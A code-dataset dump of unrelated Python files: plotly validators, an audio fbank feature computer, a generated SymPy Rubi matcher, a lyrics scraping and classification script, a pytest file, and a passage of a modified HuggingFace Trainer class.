ticks on this axis appear. Only has an effect if `tickmode` is set to "array". Used with `ticktext`. tickvalssrc Sets the source reference on plot.ly for tickvals . tickwidth Sets the tick width (in px). title plotly_study.graph_objects.scattergl.marker.colorbar. Title instance or dict with compatible properties titlefont Deprecated: Please use scattergl.marker.colorbar.title.font instead. Sets this color bar's title font. Note that the title's font used to be set by the now deprecated `titlefont` attribute. titleside Deprecated: Please use scattergl.marker.colorbar.title.side instead. Determines the location of color bar's title with respect to the color bar. Note that the title's location used to be set by the now deprecated `titleside` attribute. x Sets the x position of the color bar (in plot fraction). xanchor Sets this color bar's horizontal position anchor. This anchor binds the `x` position to the "left", "center" or "right" of the color bar. xpad Sets the amount of padding (in px) along the x direction. y Sets the y position of the color bar (in plot fraction). yanchor Sets this color bar's vertical position anchor This anchor binds the `y` position to the "top", "middle" or "bottom" of the color bar. ypad Sets the amount of padding (in px) along the y direction. """, ), **kwargs ) import _plotly_utils.basevalidators class ColoraxisValidator(_plotly_utils.basevalidators.SubplotidValidator): def __init__( self, plotly_name="coloraxis", parent_name="scattergl.marker", **kwargs ): super(ColoraxisValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, dflt=kwargs.pop("dflt", None), edit_type=kwargs.pop("edit_type", "calc"), regex=kwargs.pop("regex", "/^coloraxis([2-9]|[1-9][0-9]+)?$/"), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class ColorValidator(_plotly_utils.basevalidators.ColorValidator): def __init__(self, plotly_name="color", parent_name="scattergl.marker", **kwargs): super(ColorValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, array_ok=kwargs.pop("array_ok", True), edit_type=kwargs.pop("edit_type", "calc"), role=kwargs.pop("role", "style"), colorscale_path=kwargs.pop( "colorscale_path", "scattergl.marker.colorscale" ), **kwargs ) import _plotly_utils.basevalidators class CminValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="cmin", parent_name="scattergl.marker", **kwargs): super(CminValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {"cauto": False}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class CmidValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="cmid", parent_name="scattergl.marker", **kwargs): super(CmidValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class CmaxValidator(_plotly_utils.basevalidators.NumberValidator): def __init__(self, plotly_name="cmax", parent_name="scattergl.marker", **kwargs): super(CmaxValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {"cauto": False}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class CautoValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__(self, plotly_name="cauto", parent_name="scattergl.marker", **kwargs): super(CautoValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {}), role=kwargs.pop("role", "info"), **kwargs ) import _plotly_utils.basevalidators class AutocolorscaleValidator(_plotly_utils.basevalidators.BooleanValidator): def __init__( self, plotly_name="autocolorscale", parent_name="scattergl.marker", **kwargs ): super(AutocolorscaleValidator, self).__init__( plotly_name=plotly_name, parent_name=parent_name, edit_type=kwargs.pop("edit_type", "calc"), implied_edits=kwargs.pop("implied_edits", {}), role=kwargs.pop("role", "style"), **kwargs )
841cd9e9d8193c58fdc4c4845d4a09b81a7bd904
2b8e7eadb920e96c75697880a9c5461aa8e0c5ed
/nabu/processing/processors/feature_computers/fbank.py
77c4ebb1d59833e9ebe2c1032e1545f7cb99d2f4
[ "MIT" ]
permissive
ishandutta2007/nabu
fb963ed3cd34ee340014e0c1e77927c838bba0ad
313018a46f68cec1d4a7eb15b8b1cf68111a959c
refs/heads/master
2020-04-03T04:57:57.911576
2018-12-14T11:02:52
2018-12-14T11:02:52
155,029,958
0
0
MIT
2018-12-06T18:20:12
2018-10-28T02:59:31
Python
UTF-8
Python
false
false
1,446
py
'''@file fbank.py contains the fbank feature computer''' import numpy as np import base import feature_computer from sigproc import snip class Fbank(feature_computer.FeatureComputer): '''the feature computer class to compute fbank features''' def comp_feat(self, sig, rate): ''' compute the features Args: sig: the audio signal as a 1-D numpy array rate: the sampling rate Returns: the features as a [seq_length x feature_dim] numpy array ''' #snip the edges sig = snip(sig, rate, float(self.conf['winlen']), float(self.conf['winstep'])) feat, energy = base.logfbank(sig, rate, self.conf) if self.conf['include_energy'] == 'True': feat = np.append(feat, energy[:, np.newaxis], 1) if self.conf['dynamic'] == 'delta': feat = base.delta(feat) elif self.conf['dynamic'] == 'ddelta': feat = base.ddelta(feat) elif self.conf['dynamic'] != 'nodelta': raise Exception('unknown dynamic type') return feat def get_dim(self): '''the feature dimemsion''' dim = int(self.conf['nfilt']) if self.conf['include_energy'] == 'True': dim += 1 if self.conf['dynamic'] == 'delta': dim *= 2 elif self.conf['dynamic'] == 'ddelta': dim *= 3 return dim
90146830bfe90f1fccd9b4b89f96401860d91053
f445450ac693b466ca20b42f1ac82071d32dd991
/generated_tempdir_2019_09_15_163300/generated_part009372.py
79176e5034b71cfcfb2a2bf71973eb4b7665d2c3
[]
no_license
Upabjojr/rubi_generated
76e43cbafe70b4e1516fb761cabd9e5257691374
cd35e9e51722b04fb159ada3d5811d62a423e429
refs/heads/master
2020-07-25T17:26:19.227918
2019-09-15T15:41:48
2019-09-15T15:41:48
208,357,412
4
1
null
null
null
null
UTF-8
Python
false
false
1,292
py
from sympy.abc import * from matchpy.matching.many_to_one import CommutativeMatcher from matchpy import * from matchpy.utils import VariableWithCount from collections import deque from multiset import Multiset from sympy.integrals.rubi.constraints import * from sympy.integrals.rubi.utility_function import * from sympy.integrals.rubi.rules.miscellaneous_integration import * from sympy import * class CommutativeMatcher77334(CommutativeMatcher): _instance = None patterns = { 0: (0, Multiset({}), [ (VariableWithCount('i3.3.1.0', 1, 1, None), Mul), (VariableWithCount('i3.3.1.0_1', 1, 1, S(1)), Mul) ]) } subjects = {} subjects_by_id = {} bipartite = BipartiteGraph() associative = Mul max_optional_count = 1 anonymous_patterns = set() def __init__(self): self.add_subject(None) @staticmethod def get(): if CommutativeMatcher77334._instance is None: CommutativeMatcher77334._instance = CommutativeMatcher77334() return CommutativeMatcher77334._instance @staticmethod def get_match_iter(subject): subjects = deque([subject]) if subject is not None else deque() subst0 = Substitution() # State 77333 return yield from collections import deque
de6131cb7460f4df0537d86258086f70cd965e4f
73fbdbe4943cd4a8de371ba1af4b5cdfea3138d8
/project4_lyrics/lyrics_project/main.py
5b2eae2671200684d80d3cc5530e8486ab9cf16a
[]
no_license
GParolini/spiced_academy_projects
74524d99842e7659a38371b6e697f9fd90a9e0fa
64b9458c9294a767636211d59ae00e329fb527f5
refs/heads/master
2023-05-31T05:30:07.692702
2021-06-21T08:54:46
2021-06-21T08:54:46
363,920,518
0
0
null
2021-05-03T13:33:28
2021-05-03T12:22:05
null
UTF-8
Python
false
false
4,865
py
#!/usr/bin/env python # coding: utf-8 # # Project 4: Web scraping and text classification from colorama import init from colorama import deinit from colorama import Fore, Back, Style import pandas as pd from sklearn.model_selection import train_test_split from sklearn.linear_model import LogisticRegression from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.naive_bayes import MultinomialNB from utilities import * #Color print in terminal init() # Scraping data for artist1 print(Style.BRIGHT + Fore.RED + "Welcome to your lyrics finder") print(Fore.RED + "I can help you find the lyrics of your favourite artist on lyrics.com") print(Fore.GREEN + "Please provide below the name of the artist") name1=input() print(Fore.GREEN + "Please provide below the link to the artist webpage on lyrics.com") url1=input() urls_lyrics_list1=get_lyric_urls(url1, name1) lyrics_files1 = get_lyrics(urls_lyrics_list1, name1) # Reading the scraped data for artist1 metadata_df1 = read_metadata(name1) lyrics_df1 = read_lyrics(name1) df_artist1 = metadata_df1.merge(lyrics_df1) # Scraping data for artist2 print(Fore.RED + "You can select a second artist and then you can quiz me about the two artists") print(Fore.GREEN + "Please provide below the name of the artist") name2 =input() print(Fore.GREEN + "Please provide below the link to the artist webpage on lyrics.com") url2=input() urls_lyrics_list2=get_lyric_urls(url2, name2) lyrics_files2 = get_lyrics(urls_lyrics_list2, name2) # Reading the scraped data for artist2 metadata_df2 = read_metadata(name2) lyrics_df2 = read_lyrics(name2) df_artist2 = metadata_df2.merge(lyrics_df2) # Joining the two artists' dataframes df = pd.concat([df_artist1, df_artist2]) #train-test split X_train, X_test, y_train, y_test = train_test_split(df.drop(["author"], axis=1), df["author"], test_size=0.2, random_state=42) #cleaning the lyrics tests and transforming them in a list of strings list_cleaned_lyrics_train = clean_text_to_list(X_train) labels_train = y_train.tolist() #Bag of words vect = TfidfVectorizer() X = vect.fit_transform(list_cleaned_lyrics_train) #Transforming the test set list_cleaned_lyrics_test = clean_text_to_list(X_test) X_test_transformed = vect.transform(list_cleaned_lyrics_test) #Fitting a logistic regression model model_lr = LogisticRegression(class_weight='balanced').fit(X, y_train) score_lr = model_lr.score(X, y_train) #Checking how the logistic regression model performs on the test set ypred = model_lr.predict(X_test_transformed) score_lr = model_lr.score(X_test_transformed,y_test) probs_lr = model_lr.predict_proba(X_test_transformed) print(Fore.RED + "I am a data savvy software.") print(Fore.RED + "I can tell you that a logistic regression model applied to classify") print(Fore.RED + "the data of your two artists has a score of ", Back.GREEN + str(score_lr)) print(Back.RESET + Fore.RED + "and the probabilities for each entry in the test set are as follow ", Fore.RESET + str(probs_lr)) #Fitting a Naive Bayes model model_nb = MultinomialNB(alpha=1).fit(X, y_train) model_nb.score(X, y_train) #Checking how the Naive Bayes Model performs on the test set ypred_nb = model_nb.predict(X_test_transformed) score_nb = model_nb.score(X_test_transformed,y_test) probs_nb = model_nb.predict_proba(X_test_transformed) print(Back.RESET + Fore.RED + "Do no take me for a pedantic software, but I can also tell you that") print(Fore.RED + "a Naive Bayes model applied to classify the data of your two artists has a score of ", Back.GREEN + str(score_nb)) print(Back.RESET + Fore.RED + "and the probabilities for each entry in the test set are as follow ", Back.RESET + Fore.RESET + str(probs_nb)) #Testing user input print(Back.RESET + Fore.RED + "Now, please select a model between Logistic Regression and Naive Bayes.") print(Fore.RED + "Then you can quiz me with a few of your favourite lyrics.") print(Fore.RED + "I will tell you who is the author of the lyrics.") print(Fore.GREEN + "Please input your model choice (LR for Logistic Regression and NB for Naive Bayes)") model_to_use = input() print(Fore.GREEN + "Please input some lyrics for me to examine: ") user_lyrics = input() user_lyrics_transformed = vect.transform([user_lyrics]) if model_to_use=="LR": lr_pred = model_lr.predict(user_lyrics_transformed) lr_prob = model_lr.predict_proba(user_lyrics_transformed) print(Fore.YELLOW + Back.BLACK + str(lr_pred), str(lr_prob)) if model_to_use=="NB": nb_pred = model_nb.predict(user_lyrics_transformed) nb_prob = model_nb.predict_proba(user_lyrics_transformed) print(Fore.YELLOW + Back.BLACK + str(nb_pred), str(nb_prob)) if (model_to_use !="LR") and (model_to_use !="NB"): out = "You did not select a valid model" print(Fore.YELLOW + Back.BLACK + out) deinit()
609760859820be1e68a6de0cb45de2de2a4b6eb9
b77e464c1051dbec0dea6deaf63ccc393c17c84c
/tests/test_base.py
b49f58ee4e9aca182c4a93894ccbbe58618c0117
[ "Unlicense" ]
permissive
victtorvpb/flask-cash-back-plataform
63dad5677811df8d24999a6c4ad5e46d91d87dcd
301bcad96662e7ba8f74b8e6896248f2ac2854d3
refs/heads/main
2023-07-12T02:46:23.526791
2021-08-16T23:01:11
2021-08-16T23:01:32
397,004,794
0
0
null
null
null
null
UTF-8
Python
false
false
389
py
import pytest from flask_cash_back_plataform import BaseClass, base_function given = pytest.mark.parametrize @given("fn", [BaseClass(), base_function]) def test_parameterized(fn): assert "hello from" in fn() def test_base_function(): assert base_function() == "hello from base function" def test_base_class(): assert BaseClass().base_method() == "hello from BaseClass"
4fc79439d5cdb7cacba4370b7e8d37f14b961c4a
ac32bac45df77083f4ef3115e747038a6753936c
/adapter-transformers-customs/adapter-transformers-attn/src/transformers/trainer-with-sub-model-list.py
4c0c31f94fbf40ec2a6cf77be31c8626e614571d
[ "Apache-2.0" ]
permissive
Yujin-Yujin/rexpert
13e1d5c4ca55664dd9fbb9a765ea5157a2e0893f
ed8628dc053194fee40e593b1cc5ec45a26c8073
refs/heads/main
2023-06-22T05:58:42.269923
2021-07-23T06:35:43
2021-07-23T06:35:43
373,423,887
0
0
null
null
null
null
UTF-8
Python
false
false
82,655
py
# coding=utf-8 # Copyright 2020-present the HuggingFace Inc. team. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ The Trainer class, to easily train a 🤗 Transformers from scratch or finetune it on a new task. """ import collections import inspect import math import os import re import shutil import warnings from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Tuple, Union # Integrations must be imported before ML frameworks: from .integrations import ( # isort: split default_hp_search_backend, hp_params, is_azureml_available, is_comet_available, is_mlflow_available, is_optuna_available, is_ray_available, is_tensorboard_available, is_wandb_available, run_hp_search_optuna, run_hp_search_ray, ) import numpy as np import torch from packaging import version from torch import nn from torch.utils.data.dataloader import DataLoader from torch.utils.data.dataset import Dataset from torch.utils.data.distributed import DistributedSampler from torch.utils.data.sampler import RandomSampler, SequentialSampler from .data.data_collator import DataCollator, DataCollatorWithPadding, default_data_collator from .file_utils import WEIGHTS_NAME, is_datasets_available, is_in_notebook, is_torch_tpu_available from .modeling_auto import MODEL_FOR_QUESTION_ANSWERING_MAPPING from .modeling_utils import PreTrainedModel from .optimization import AdamW, get_linear_schedule_with_warmup from .tokenization_utils_base import PreTrainedTokenizerBase from .trainer_callback import ( CallbackHandler, DefaultFlowCallback, PrinterCallback, ProgressCallback, TrainerCallback, TrainerControl, TrainerState, ) from .trainer_pt_utils import ( DistributedTensorGatherer, SequentialDistributedSampler, distributed_broadcast_scalars, distributed_concat, get_tpu_sampler, nested_concat, nested_detach, nested_numpify, nested_xla_mesh_reduce, reissue_pt_warnings, ) from .trainer_utils import ( PREFIX_CHECKPOINT_DIR, BestRun, EvalPrediction, HPSearchBackend, PredictionOutput, TrainOutput, default_compute_objective, default_hp_space, set_seed, ) from .training_args import TrainingArguments from .utils import logging _use_native_amp = False _use_apex = False DEFAULT_CALLBACKS = [DefaultFlowCallback] DEFAULT_PROGRESS_CALLBACK = ProgressCallback if is_in_notebook(): from .utils.notebook import NotebookProgressCallback DEFAULT_PROGRESS_CALLBACK = NotebookProgressCallback # Check if Pytorch version >= 1.6 to switch between Native AMP and Apex if version.parse(torch.__version__) < version.parse("1.6"): from .file_utils import is_apex_available if is_apex_available(): from apex import amp _use_apex = True else: _use_native_amp = True from torch.cuda.amp import autocast if version.parse(torch.__version__) < version.parse("1.2"): _use_ddp_no_sync = False else: _use_ddp_no_sync = True if is_datasets_available(): import datasets if is_torch_tpu_available(): import torch_xla.core.xla_model as xm import torch_xla.debug.metrics as met import torch_xla.distributed.parallel_loader as pl if is_tensorboard_available(): from .integrations import TensorBoardCallback DEFAULT_CALLBACKS.append(TensorBoardCallback) if is_wandb_available(): from .integrations import WandbCallback DEFAULT_CALLBACKS.append(WandbCallback) if is_comet_available(): from .integrations import CometCallback DEFAULT_CALLBACKS.append(CometCallback) if is_mlflow_available(): from .integrations import MLflowCallback DEFAULT_CALLBACKS.append(MLflowCallback) if is_optuna_available(): import optuna if is_ray_available(): from ray import tune if is_azureml_available(): from .integrations import AzureMLCallback DEFAULT_CALLBACKS.append(AzureMLCallback) logger = logging.get_logger(__name__) class Trainer: """ Trainer is a simple but feature-complete training and eval loop for PyTorch, optimized for 🤗 Transformers. Args: model (:class:`~transformers.PreTrainedModel` or :obj:`torch.nn.Module`, `optional`): The model to train, evaluate or use for predictions. If not provided, a ``model_init`` must be passed. .. note:: :class:`~transformers.Trainer` is optimized to work with the :class:`~transformers.PreTrainedModel` provided by the library. You can still use your own models defined as :obj:`torch.nn.Module` as long as they work the same way as the 🤗 Transformers models. args (:class:`~transformers.TrainingArguments`, `optional`): The arguments to tweak for training. Will default to a basic instance of :class:`~transformers.TrainingArguments` with the ``output_dir`` set to a directory named `tmp_trainer` in the current directory if not provided. data_collator (:obj:`DataCollator`, `optional`): The function to use to form a batch from a list of elements of :obj:`train_dataset` or :obj:`eval_dataset`. Will default to :func:`~transformers.default_data_collator` if no ``tokenizer`` is provided, an instance of :func:`~transformers.DataCollatorWithPadding` otherwise. train_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): The dataset to use for training. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. eval_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): The dataset to use for evaluation. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. tokenizer (:class:`PreTrainedTokenizerBase`, `optional`): The tokenizer used to preprocess the data. If provided, will be used to automatically pad the inputs the maximum length when batching inputs, and it will be saved along the model to make it easier to rerun an interrupted training or reuse the fine-tuned model. model_init (:obj:`Callable[[], PreTrainedModel]`, `optional`): A function that instantiates the model to be used. If provided, each call to :meth:`~transformers.Trainer.train` will start from a new instance of the model as given by this function. The function may have zero argument, or a single one containing the optuna/Ray Tune trial object, to be able to choose different architectures according to hyper parameters (such as layer count, sizes of inner layers, dropout probabilities etc). compute_metrics (:obj:`Callable[[EvalPrediction], Dict]`, `optional`): The function that will be used to compute metrics at evaluation. Must take a :class:`~transformers.EvalPrediction` and return a dictionary string to metric values. callbacks (List of :obj:`~transformers.TrainerCallback`, `optional`): A list of callbacks to customize the training loop. Will add those to the list of default callbacks detailed in :doc:`here <callback>`. If you want to remove one of the default callbacks used, use the :meth:`Trainer.remove_callback` method. optimizers (:obj:`Tuple[torch.optim.Optimizer, torch.optim.lr_scheduler.LambdaLR`, `optional`): A tuple containing the optimizer and the scheduler to use. Will default to an instance of :class:`~transformers.AdamW` on your model and a scheduler given by :func:`~transformers.get_linear_schedule_with_warmup` controlled by :obj:`args`. kwargs: Deprecated keyword arguments. """ def __init__( self, model: Union[PreTrainedModel, torch.nn.Module] = None, sub_model_list: Optional[List[Union[PreTrainedModel, torch.nn.Module]]] = None, args: TrainingArguments = None, data_collator: Optional[DataCollator] = None, train_dataset: Optional[Dataset] = None, eval_dataset: Optional[Dataset] = None, tokenizer: Optional["PreTrainedTokenizerBase"] = None, model_init: Callable[[], PreTrainedModel] = None, compute_metrics: Optional[Callable[[EvalPrediction], Dict]] = None, callbacks: Optional[List[TrainerCallback]] = None, do_save_full_model: bool = True, do_save_adapters: bool = False, do_save_adapter_fusion: bool = False, adapter_names: Optional[List[List[str]]] = None, optimizers: Tuple[torch.optim.Optimizer, torch.optim.lr_scheduler.LambdaLR] = (None, None), **kwargs, ): if args is None: logger.info("No `TrainingArguments` passed, using the current path as `output_dir`.") args = TrainingArguments("tmp_trainer") self.args = args # Seed must be set before instantiating the model when using model set_seed(self.args.seed) assert ( model is not None or model_init is not None ), "You must provide a model to use `Trainer`, either by using the `model` argument or the `model_init` argument." self.model_init = model_init self.hp_name = None if model is None and model_init is not None: model = self.call_model_init() self.model = model.to(args.device) if model is not None else None if sub_model_list is None: self.sub_model_list = None else: if len(sub_model_list) > 0 : self.sub_model_list = nn.ModuleList(sub_model_list).to(args.device) else: self.sub_model_list = None default_collator = default_data_collator if tokenizer is None else DataCollatorWithPadding(tokenizer) self.data_collator = data_collator if data_collator is not None else default_collator self.train_dataset = train_dataset self.eval_dataset = eval_dataset self.tokenizer = tokenizer self.compute_metrics = compute_metrics self.optimizer, self.lr_scheduler = optimizers if model_init is not None and (self.optimizer is not None or self.lr_scheduler is not None): raise RuntimeError( "Passing a `model_init` is incompatible with providing the `optimizers` argument." "You should subclass `Trainer` and override the `create_optimizer_and_scheduler` method." ) callbacks = DEFAULT_CALLBACKS if callbacks is None else DEFAULT_CALLBACKS + callbacks self.callback_handler = CallbackHandler(callbacks, self.model, self.optimizer, self.lr_scheduler) self.add_callback(PrinterCallback if self.args.disable_tqdm else DEFAULT_PROGRESS_CALLBACK) # Deprecated arguments if "tb_writer" in kwargs: warnings.warn( "Passing `tb_writer` as a keyword argument is deprecated and won't be possible in a " + "future version. Use `TensorBoardCallback(tb_writer=...)` instead and pass it to the `callbacks`" + "argument", FutureWarning, ) tb_writer = kwargs.pop("tb_writer") self.remove_callback(TensorBoardCallback) self.add_callback(TensorBoardCallback(tb_writer=tb_writer)) if "prediction_loss_only" in kwargs: warnings.warn( "Passing `prediction_loss_only` as a keyword argument is deprecated and won't be possible in a " + "future version. Use `args.prediction_loss_only` instead. Setting " + f"`args.prediction_loss_only={kwargs['prediction_loss_only']}", FutureWarning, ) self.args.prediction_loss_only = kwargs.pop("prediction_loss_only") assert kwargs == {}, f"Unexpected keyword arguments: {list(kwargs.keys())}." # Will be set to True by `self._setup_loggers()` on first call to `self.log()`. self._loggers_initialized = False # Create output directory if needed if self.is_world_process_zero(): os.makedirs(self.args.output_dir, exist_ok=True) # adapters used self.do_save_full_model = do_save_full_model self.do_save_adapters = do_save_adapters self.do_save_adapter_fusion = do_save_adapter_fusion self.adapter_names = adapter_names if is_torch_tpu_available() and isinstance(self.model, PreTrainedModel): # Set an xla_device flag on the model's config. # We'll find a more elegant and not need to do this in the future. self.model.config.xla_device = True if not callable(self.data_collator) and callable(getattr(self.data_collator, "collate_batch", None)): self.data_collator = self.data_collator.collate_batch warnings.warn( ( "The `data_collator` should now be a simple callable (function, class with `__call__`), classes " + "with a `collate_batch` are deprecated and won't be supported in a future version." ), FutureWarning, ) if args.max_steps > 0: logger.info("max_steps is given, it will override any value given in num_train_epochs") # Enforce rules on using datasets with no __len__ if train_dataset is not None and not isinstance(train_dataset, collections.abc.Sized) and args.max_steps <= 0: raise ValueError("train_dataset does not implement __len__, max_steps has to be specified") if eval_dataset is not None and not isinstance(eval_dataset, collections.abc.Sized): raise ValueError("eval_dataset must implement __len__") if is_datasets_available(): if isinstance(train_dataset, datasets.Dataset): self._remove_unused_columns(self.train_dataset, description="training") if isinstance(eval_dataset, datasets.Dataset): self._remove_unused_columns(self.eval_dataset, description="evaluation") self.state = TrainerState() self.control = TrainerControl() # Internal variable for total_flos used to count as tensors (for distributed + TPU), will be sent in the # state at each call to self.log. self._total_flos = None if self.args.fp16 and _use_native_amp: self.scaler = torch.cuda.amp.GradScaler() self.hp_search_backend = None self.use_tune_checkpoints = False default_label_names = ( ["start_positions", "end_positions"] if type(self.model) in MODEL_FOR_QUESTION_ANSWERING_MAPPING.values() else ["labels"] ) self.label_names = default_label_names if self.args.label_names is None else self.args.label_names self.control = self.callback_handler.on_init_end(self.args, self.state, self.control) def add_callback(self, callback): """ Add a callback to the current list of :class:`~transformer.TrainerCallback`. Args: callback (:obj:`type` or :class:`~transformer.TrainerCallback`): A :class:`~transformer.TrainerCallback` class or an instance of a :class:`~transformer.TrainerCallback`. In the first case, will instantiate a member of that class. """ self.callback_handler.add_callback(callback) def pop_callback(self, callback): """ Remove a callback from the current list of :class:`~transformer.TrainerCallback` and returns it. If the callback is not found, returns :obj:`None` (and no error is raised). Args: callback (:obj:`type` or :class:`~transformer.TrainerCallback`): A :class:`~transformer.TrainerCallback` class or an instance of a :class:`~transformer.TrainerCallback`. In the first case, will pop the first member of that class found in the list of callbacks. Returns: :class:`~transformer.TrainerCallback`: The callback removed, if found. """ return self.callback_handler.pop_callback(callback) def remove_callback(self, callback): """ Remove a callback from the current list of :class:`~transformer.TrainerCallback`. Args: callback (:obj:`type` or :class:`~transformer.TrainerCallback`): A :class:`~transformer.TrainerCallback` class or an instance of a :class:`~transformer.TrainerCallback`. In the first case, will remove the first member of that class found in the list of callbacks. """ self.callback_handler.remove_callback(callback) def _remove_unused_columns(self, dataset: "datasets.Dataset", description: Optional[str] = None): if not self.args.remove_unused_columns: return # Inspect model forward signature to keep only the arguments it accepts. signature = inspect.signature(self.model.forward) signature_columns = list(signature.parameters.keys()) # Labels may be named label or label_ids, the default data collator handles that. signature_columns += ["label", "label_ids"] columns = [k for k in signature_columns if k in dataset.column_names] ignored_columns = list(set(dataset.column_names) - set(signature_columns)) dset_description = "" if description is None else f"in the {description} set " logger.info( f"The following columns {dset_description}don't have a corresponding argument in `{self.model.__class__.__name__}.forward` and have been ignored: {', '.join(ignored_columns)}." ) dataset.set_format(type=dataset.format["type"], columns=columns) def _get_train_sampler(self) -> Optional[torch.utils.data.sampler.Sampler]: if isinstance(self.train_dataset, torch.utils.data.IterableDataset) or not isinstance( self.train_dataset, collections.abc.Sized ): return None elif is_torch_tpu_available(): return get_tpu_sampler(self.train_dataset) else: return ( RandomSampler(self.train_dataset) if self.args.local_rank == -1 else DistributedSampler(self.train_dataset) ) def get_train_dataloader(self) -> DataLoader: """ Returns the training :class:`~torch.utils.data.DataLoader`. Will use no sampler if :obj:`self.train_dataset` does not implement :obj:`__len__`, a random sampler (adapted to distributed training if necessary) otherwise. Subclass and override this method if you want to inject some custom behavior. """ if self.train_dataset is None: raise ValueError("Trainer: training requires a train_dataset.") train_sampler = self._get_train_sampler() return DataLoader( self.train_dataset, batch_size=self.args.train_batch_size, sampler=train_sampler, collate_fn=self.data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, ) def _get_eval_sampler(self, eval_dataset: Dataset) -> Optional[torch.utils.data.sampler.Sampler]: if is_torch_tpu_available(): return SequentialDistributedSampler(eval_dataset, num_replicas=xm.xrt_world_size(), rank=xm.get_ordinal()) elif self.args.local_rank != -1: return SequentialDistributedSampler(eval_dataset) else: return SequentialSampler(eval_dataset) def get_eval_dataloader(self, eval_dataset: Optional[Dataset] = None) -> DataLoader: """ Returns the evaluation :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: eval_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`. """ if eval_dataset is None and self.eval_dataset is None: raise ValueError("Trainer: evaluation requires an eval_dataset.") elif eval_dataset is not None and not isinstance(eval_dataset, collections.abc.Sized): raise ValueError("eval_dataset must implement __len__") elif is_datasets_available() and isinstance(eval_dataset, datasets.Dataset): self._remove_unused_columns(eval_dataset, description="evaluation") eval_dataset = eval_dataset if eval_dataset is not None else self.eval_dataset eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader( eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=self.data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, ) def get_test_dataloader(self, test_dataset: Dataset) -> DataLoader: """ Returns the test :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: test_dataset (:obj:`torch.utils.data.dataset.Dataset`, `optional`): The test dataset to use. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`. """ if not isinstance(test_dataset, collections.abc.Sized): raise ValueError("test_dataset must implement __len__") elif is_datasets_available() and isinstance(test_dataset, datasets.Dataset): self._remove_unused_columns(test_dataset, description="test") test_sampler = self._get_eval_sampler(test_dataset) # We use the same batch_size as for eval. return DataLoader( test_dataset, sampler=test_sampler, batch_size=self.args.eval_batch_size, collate_fn=self.data_collator, drop_last=self.args.dataloader_drop_last, ) def create_optimizer_and_scheduler(self, num_training_steps: int): """ Setup the optimizer and the learning rate scheduler. We provide a reasonable default that works well. If you want to use something else, you can pass a tuple in the Trainer's init through :obj:`optimizers`, or subclass and override this method in a subclass. """ if self.optimizer is None: no_decay = ["bias", "LayerNorm.weight"] if hasattr(self.model.config, "adapter_fusion_models"): no_decay += [f"adapter_fusion_layer.{n}.value" for n in self.model.config.adapter_fusion_models] optimizer_grouped_parameters = [ { "params": [p for n, p in self.model.named_parameters() if not any(nd in n for nd in no_decay)], "weight_decay": self.args.weight_decay, }, { "params": [p for n, p in self.model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0, }, ] self.optimizer = AdamW( optimizer_grouped_parameters, lr=self.args.learning_rate, betas=(self.args.adam_beta1, self.args.adam_beta2), eps=self.args.adam_epsilon, ) if self.lr_scheduler is None: self.lr_scheduler = get_linear_schedule_with_warmup( self.optimizer, num_warmup_steps=self.args.warmup_steps, num_training_steps=num_training_steps ) def num_examples(self, dataloader: DataLoader) -> int: """ Helper to get number of samples in a :class:`~torch.utils.data.DataLoader` by accessing its dataset. Will raise an exception if the underlying dataset dese not implement method :obj:`__len__` """ return len(dataloader.dataset) def _hp_search_setup(self, trial: Union["optuna.Trial", Dict[str, Any]]): """ HP search setup code """ self._trial = trial if self.hp_search_backend is None or trial is None: return params = self.hp_space(trial) if self.hp_search_backend == HPSearchBackend.OPTUNA else trial for key, value in params.items(): if not hasattr(self.args, key): raise AttributeError( f"Trying to set {key} in the hyperparameter search but there is no corresponding field in `TrainingArguments`." ) old_attr = getattr(self.args, key, None) # Casting value to the proper type if old_attr is not None: value = type(old_attr)(value) setattr(self.args, key, value) if self.hp_search_backend == HPSearchBackend.OPTUNA: logger.info("Trial:", trial.params) def _report_to_hp_search( self, trial: Union["optuna.Trial", Dict[str, Any]], 